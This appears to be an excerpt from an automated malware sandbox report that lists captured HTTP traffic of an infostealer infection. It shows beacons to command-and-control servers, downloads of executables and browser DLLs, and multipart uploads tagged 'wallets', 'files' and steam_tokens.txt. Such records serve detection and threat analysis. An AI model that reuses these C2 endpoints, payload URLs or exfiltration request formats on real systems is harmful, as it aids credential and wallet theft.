                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGHHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 2d 2d 0d 0a Data Ascii: ------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="file"------GCAKKECAEGDGCBFIJEGH--
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000254001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: GET /inc/crypted.exe HTTP/1.1Host: 185.215.113.117
                                  Source: global trafficHTTP traffic detected: GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                  Source: global trafficHTTP traffic detected: GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000290001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                  Source: global trafficHTTP traffic detected: GET /inc/LummaC222222.exe HTTP/1.1Host: 185.215.113.117
                                  Source: global trafficHTTP traffic detected: GET /f1ddeb6592c03206/nss3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000314001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                  Source: global trafficHTTP traffic detected: GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /inc/newbundle2.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                  Source: global trafficHTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJEHost: 185.215.113.17Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 32 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000322001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCGHost: 185.215.113.17Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 2d 2d 0d 0a Data Ascii: ------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="message"wallets------JKJDBAAAEHIEGCAKFHCG--
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                  Source: global trafficHTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGDHost: 185.215.113.17Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 2d 2d 0d 0a Data Ascii: ------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="message"files------CGHDAKKJJJKJKECBGCGD--
                                  Source: global trafficHTTP traffic detected: GET /inc/rstxdhuj.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGCHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 2d 2d 0d 0a Data Ascii: ------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="file"------AKECBFBAEBKJJJJKFCGC--
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBAHost: 185.215.113.17Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 2d 2d 0d 0a Data Ascii: ------GHJDHDAECBGCAKEBAEBAContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------GHJDHDAECBGCAKEBAEBAContent-Disposition: form-data; name="message"ybncbhylepme------GHJDHDAECBGCAKEBAEBA--
                                  Source: global trafficHTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAKHost: 185.215.113.17Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 4b 2d 2d 0d 0a Data Ascii: ------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------BKECFIIEHCFHIECAFBAKContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BKECFIIEHCFHIECAFBAK--
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000342001&unit=246122658369
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                  Source: global trafficHTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 91.202.233.158Connection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /inc/cccc2.exe HTTP/1.1Host: 185.215.113.16
